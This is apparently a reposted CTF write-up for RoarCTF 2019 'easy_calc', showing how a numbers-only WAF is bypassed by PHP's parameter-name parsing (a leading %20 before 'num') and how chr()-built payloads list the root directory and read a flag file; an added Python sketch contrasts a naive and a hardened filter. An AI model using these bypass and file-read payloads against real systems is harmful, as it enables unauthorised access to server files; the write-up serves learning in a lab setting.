
ctf [RoarCTF 2019]easy_calc

2022-06-26 04:16:00 eliforsharon

I learned something new, so I am writing it down.
First, calc.php is easy to find, but the GET parameter in the URL does not accept letters. After some searching I found that this is about PHP's string (query parameter) parsing features.

Bypass using PHP's string parsing features

Using PHP string parsing features to bypass (linked article)
That article is very detailed. The challenge's WAF only allows numbers and rejects any string in the input; using num=%20 bypasses it.
Once past the WAF, chr() can be used to build the filtered characters (such as "/" and the file name) without typing them.
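As an added example (not from the original write-up), a small Python model of the parameter-name normalization that underlies this bypass, next to a check that applies the same normalization before filtering; the allowlist regex, query strings and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical "numbers only" allowlist for the calc parameter (constructed).
ALLOWED_VALUE = re.compile(r"^[0-9+\-*/(). ]*$")


def php_normalize_name(name: str) -> str:
    """Approximate how PHP derives a $_GET key from a raw query-string name:
    leading spaces are skipped, remaining spaces and dots become '_'.
    Simplified model: the '[...]' array syntax is not handled."""
    name = name.lstrip(" ")
    return name.replace(" ", "_").replace(".", "_")


def parse_query_like_php(query: str) -> dict:
    """Build the parameter map the PHP application will actually see."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        raw_name, _, raw_value = pair.partition("=")
        key = php_normalize_name(unquote_plus(raw_name))
        if key:
            params[key] = unquote_plus(raw_value)
    return params


def naive_waf_allows(query: str) -> bool:
    """Weak check: looks for the literal text 'num=' in the raw query string.
    If it does not find that parameter, it has nothing to inspect and lets
    the request through, even though PHP may still populate $_GET['num']."""
    m = re.search(r"(?:^|&)num=([^&]*)", query)
    if m is None:
        return True
    return bool(ALLOWED_VALUE.match(unquote_plus(m.group(1))))


def hardened_waf_allows(query: str) -> bool:
    """Apply the allowlist to the value the application will really receive,
    i.e. after the same name normalization PHP performs."""
    value = parse_query_like_php(query).get("num")
    return value is None or bool(ALLOWED_VALUE.match(value))
```

With a constructed query such as "%20num=abc" the naive check sees no "num" parameter and allows it, while PHP still ends up with num=abc; the hardened check rejects it.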

List the root directory (chr(47) is "/")

var_dump(scandir(chr(47)));


Read the f1agg file (the chr() sequence below spells "/f1agg")

var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));


Bypass using HTTP smuggling

Related vulnerability articles (linked)
It relies on the front end and the back end receiving inconsistent data; I don't quite understand it yet QAQ

Original site

Copyright notice
This article was written by [eliforsharon]; please include the original link when reposting. Thanks.
https://yzsam.com/2022/02/202202180536406828.html